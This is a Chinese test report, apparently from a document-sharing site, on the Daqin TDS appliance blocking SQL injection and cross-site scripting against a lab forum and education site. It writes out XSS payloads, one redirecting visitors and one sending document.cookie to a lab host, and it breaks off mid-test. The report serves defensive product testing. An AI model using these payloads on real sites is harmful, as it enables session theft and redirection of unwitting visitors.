- 1、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。。
- 2、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载。
- 3、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
- 4、该文档为VIP文档,如果想要下载,成为VIP会员后,下载免费。
- 5、成为VIP后,下载本文档将扣除1次下载权益。下载后,不支持退款、换文档。如有疑问请联系我们。
- 6、成为VIP后,您将拥有八大权益,权益包括:VIP文档下载权益、阅读免打扰、文档格式转换、高级专利检索、专属身份标志、高级客服、多端互通、版权登记。
- 7、VIP文档为合作方或网友上传,每下载1次, 网站将根据用户上传文档的质量评分、类型等,对文档贡献者给予高额补贴、流量扶持。如果你也想贡献VIP文档。上传文档
查看更多
TDS防SQL脚本注入攻击测试
TDS防SQL注入或脚本攻击测试
一、大秦TDS防SQL注入测试结构
大秦TDS防SQL注入测试结构由TDS系统、1台Web服务器、1台管理控制终端、1台攻击终端和互联网环境组成。网络结构图如下:
其中Web服务器(2)存在2种web应用,一种是“大秦TDS系统防SQL注入模拟Web服务器”,访问网址是:2/dqbbs/;一种是“大秦TDS防SQL注入测试网站”,访问网址是:2:8080/edu/。大秦TDS系统防SQL注入模拟Web服务器是种bbs论坛,通过各种SQL注入,普通注册用户能够跳过用户名密码检测获取论坛用户数据,同时通过发帖挂上恶意脚本,获取访问者的cookies信息和将访问者访问页面定向指定的url等恶意行为。首页显示如下图:
大秦TDS防SQL注入测试网站是种模拟在线远程教育网站,访问者可以通过构造脚本作为url地址,获取目标服务器的操作系统类型、数据库类型等资源信息。首页显示如下图:
二、TDS防SQL脚本注入攻击测试用例
2.1 跳过用户名密码登陆验证的SQL注入
2.1.1没有TDS保护情况下的SQL注入
A,使用正确的用户名和密码正常登陆;
使用正确的用户名和密码可以正常登陆。
B,使用不正确的用户名或密码登陆;
错误的用户名或密码验证失败。
C,使用带SQL语句的用户名和任意密码登陆(包括空密码);
空密码登陆:
使用带SQL语句的用户名和空密码可以登陆。
非空密码登陆:
在使用带SQL语句的用户名情况下可以使用任意密码登陆验证。
2.1.2有TDS保护情况下的SQL注入
使用带SQL语的用户名登陆;
输入带有SQL语句的用户名被TDS检测到,给予用户提示及对行为进行阻止,最终无法打开网页。
其中TDS防SQL注入模块配置如下图:
TDS流量统计如下图:
2.2 获取用户数据信息的SQL注入
2.2.1没有TDS保护情况下的SQL注入
A, 输入存在的用户编号进行查询;
输入存在的用户编号进行查询,可以查询到对应用户编号的信息。
B,输入不存在的用户编号进行查询;
由于不存在该用户编号,所以没有相关用户信息显示。
C,输入带SQL语句的用户编号的数据进行查询;
输入带SQL语句的用户编号进行查询后,可以查询到所有用户编号的信息。
2.2.2有TDS保护情况下的SQL注入
A,输入带SQL语句的职业编号的数据进行查询;
输入带有SQL语句的用户编号被TDS检测到,给予用户提示及对行为进行阻止,最终无法打开网页。
其中TDS防SQL注入模块配置如下图:
TDS流量统计如下图:
2.3 恶意重定向网站的脚本跨站攻击
2.3.1没有TDS保护情况下的脚本跨站攻击
A,打开Web服务器首页,注册一个论坛用户,进入某个论坛板块发表论坛文章;
B,在文本输入框输入下列内容:
“scriptlocation.href=;alert(你中了跨站攻击,现在转接到百度首页!→→^_^※^_^);/script”,点击提交,成功发表论坛帖子;
C,打开首页,点击标题为“跨连接演示”的论坛帖子;
D,弹出跨站攻击提示对话框,同时网页转到百度首页。
2.3.2有TDS保护情下的脚本跨站攻击
A,打开Web服务器首页,注册一个论坛用户,进入某个论坛板块发表论坛文章;
B,在文本输入框输入下列内容:
“scriptlocation.href=;alert(你中了跨站攻击,现在转接到百度首页!→→^_^※^_^);/script”,点击提交,弹出TDS防SQL注入安全警告,内容发表失败;
其中TDS防SQL注入模块配置如下图:
TDS数据流量统计如下图:
2.4 获取访问者的cookies信息的SQL注入
2.4.1没有TDS保护情况下的SQL注入
A,打开Web服务器首页,注册一个论坛用户,进入某个论坛板块发表论坛文章;
B,在文本输入框输入下列内容:
“你的Cookit信息已经被获取,信息就显示新打开的窗口scriptwindow.open(2:8080/edu/XSS.asp?txtName=+document.cookie);alert(你中招啦! ^_^);/script”,点击提交,成功发表论坛帖子;
C,打开首页,点击标题为“获取访问者的cookies信息演示”的论坛帖子;
D,弹出一个标题为“访问者的cookies信息”的新窗口,同时弹出“你中招了,^_^”的对话框提示;
打开的帖子内容并不会显示脚本里的内容,只是显示纯文本内容,如下图:
2.4.2有TDS保护情况下的SQL注入
A,打开Web服务器首页,注册一个论坛用户,进入某个论坛板块发表论坛文章;
B,
您可能关注的文档
最近下载
- 剑桥英语PET真题标准版二.docx VIP
- 大学生国情社会调查报告.docx VIP
- 2025中国移动通信集团重庆有限公司社会招聘笔试备考题库及答案解析.docx VIP
- 山东科学技术版劳动实践指导手册一年级第2课清洁与卫生干干净净真舒服刷牙 教案.pdf VIP
- 人教版劳动一年级上册项目一《洗手》(教案).docx VIP
- 《南京照相馆》电影介绍ppt课件(优质ppt).pptx VIP
- 病人发生滑倒.pptx VIP
- 部编版语文三年级上册习作:写日记练习卷.doc VIP
- 部编版语文三年级上册第二单元 习作:写日记练习卷.doc VIP
- 2025广东东莞农村商业银行校园招聘笔试历年典型考题及考点剖析附带答案详解.docx
文档评论(0)